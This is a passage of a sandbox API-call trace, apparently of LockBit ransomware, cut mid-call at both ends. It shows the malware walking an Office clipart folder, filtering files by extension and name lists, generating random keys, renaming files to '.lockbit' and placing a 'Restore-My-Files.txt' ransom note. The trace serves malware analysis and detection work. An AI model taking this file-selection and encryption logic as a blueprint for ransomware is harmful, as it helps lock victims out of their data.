(lpString1=".dll", lpString2=".WMF") returned -1 [0147.579] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.579] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.579] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.579] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.579] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.579] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.579] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.579] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.579] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0182888.WMF") returned 1 [0147.579] lstrcmpiW (lpString1="ntldr", lpString2="J0182888.WMF") returned 1 [0147.579] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0182888.WMF") returned 1 [0147.579] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0182888.WMF") returned -1 [0147.580] lstrcmpiW (lpString1="autorun.inf", lpString2="J0182888.WMF") returned -1 [0147.580] lstrcmpiW (lpString1="thumbs.db", lpString2="J0182888.WMF") returned 1 [0147.580] lstrcmpiW (lpString1="iconcache.db", lpString2="J0182888.WMF") returned -1 [0147.580] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.580] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF") returned=".WMF" [0147.580] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.580] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.580] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.580] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.580] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.580] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.580] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.580] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.580] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.580] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.580] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.580] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.580] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.580] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.580] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.580] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.581] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.581] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.581] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.581] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.581] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.581] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.581] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.581] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.581] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.581] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.581] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.581] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.581] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF.lockbit") returned 72 [0147.581] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182888.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0147.582] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.582] malloc (_Size=0x40068) returned 0x1ff1e60 [0147.582] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=24392) returned 1 [0147.582] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.583] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0147.583] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.584] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0147.584] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0147.589] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.589] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.589] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.591] free (_Block=0x1fa2ed8) [0147.591] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.591] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.591] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.591] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5649e8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3b2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0182898.WMF", cAlternateFileName="")) returned 1 [0147.591] lstrcmpiW (lpString1=".", lpString2="J0182898.WMF") returned -1 [0147.591] lstrcmpiW (lpString1="..", lpString2="J0182898.WMF") returned -1 [0147.591] PathFindExtensionW (pszPath="J0182898.WMF") returned=".WMF" [0147.591] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.591] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.591] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.591] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.592] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.592] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.592] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.592] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.592] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.592] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.592] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.592] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.592] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.592] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.592] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.592] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.592] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.592] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.592] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.592] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.593] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.593] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.593] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.593] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.593] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.593] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.593] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.593] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.593] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.593] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.593] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.593] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.593] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.593] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.593] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.593] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.594] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.594] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.594] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.594] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.594] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.594] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.594] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.594] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.594] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.594] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.594] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.594] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0182898.WMF") returned 1 [0147.594] lstrcmpiW (lpString1="ntldr", lpString2="J0182898.WMF") returned 1 [0147.594] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0182898.WMF") returned 1 [0147.594] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0182898.WMF") returned -1 [0147.594] lstrcmpiW (lpString1="autorun.inf", lpString2="J0182898.WMF") returned -1 [0147.594] lstrcmpiW (lpString1="thumbs.db", lpString2="J0182898.WMF") returned 1 [0147.594] lstrcmpiW (lpString1="iconcache.db", lpString2="J0182898.WMF") returned -1 [0147.595] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.595] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF") returned=".WMF" [0147.595] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.595] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.595] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.595] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.595] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.595] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.595] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.595] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.595] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.595] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.595] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.595] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.595] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.595] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.595] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.595] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.596] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.596] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.596] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.596] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.596] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.596] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.596] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.596] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.596] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.596] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.596] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.596] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.596] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF.lockbit") returned 72 [0147.596] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182898.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0147.597] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.597] malloc (_Size=0x40068) returned 0x3e70008 [0147.598] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=15150) returned 1 [0147.598] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.598] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0147.599] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.599] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0147.599] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0147.605] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.605] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.605] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.606] free (_Block=0x1fa2ed8) [0147.607] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.607] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.607] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.607] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65fbf9f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1e8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0182902.WMF", cAlternateFileName="")) returned 1 [0147.607] lstrcmpiW (lpString1=".", lpString2="J0182902.WMF") returned -1 [0147.607] lstrcmpiW (lpString1="..", lpString2="J0182902.WMF") returned -1 [0147.607] PathFindExtensionW (pszPath="J0182902.WMF") returned=".WMF" [0147.607] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.607] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.607] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.607] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.607] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.607] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.607] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.607] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.607] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.607] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.608] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.608] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.608] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.608] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.608] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.608] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.608] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.608] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.608] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.608] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.608] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.608] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.608] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.608] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.608] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.608] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.608] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.608] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.608] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.608] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.609] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.609] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.609] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.609] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.609] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.609] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.609] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.609] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.609] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.609] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.609] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.609] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.609] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.609] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.609] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.609] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.609] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.609] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0182902.WMF") returned 1 [0147.609] lstrcmpiW (lpString1="ntldr", lpString2="J0182902.WMF") returned 1 [0147.610] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0182902.WMF") returned 1 [0147.610] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0182902.WMF") returned -1 [0147.610] lstrcmpiW (lpString1="autorun.inf", lpString2="J0182902.WMF") returned -1 [0147.610] lstrcmpiW (lpString1="thumbs.db", lpString2="J0182902.WMF") returned 1 [0147.610] lstrcmpiW (lpString1="iconcache.db", lpString2="J0182902.WMF") returned -1 [0147.610] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.610] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF") returned=".WMF" [0147.610] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.610] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.610] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.610] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.610] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.610] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.610] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.610] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.610] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.610] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.610] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.611] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.611] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.611] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.611] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.611] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.611] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.611] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.611] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.611] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.611] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.611] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.611] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.611] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.611] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.611] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.611] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.611] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.611] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF.lockbit") returned 72 [0147.612] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182902.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0147.613] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.613] malloc (_Size=0x40068) returned 0x3d70450 [0147.613] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=7822) returned 1 [0147.613] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.614] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0147.614] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.614] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0147.615] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0147.621] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.621] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.621] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.622] free (_Block=0x1fa2ed8) [0147.622] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.622] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.622] CreateFileW 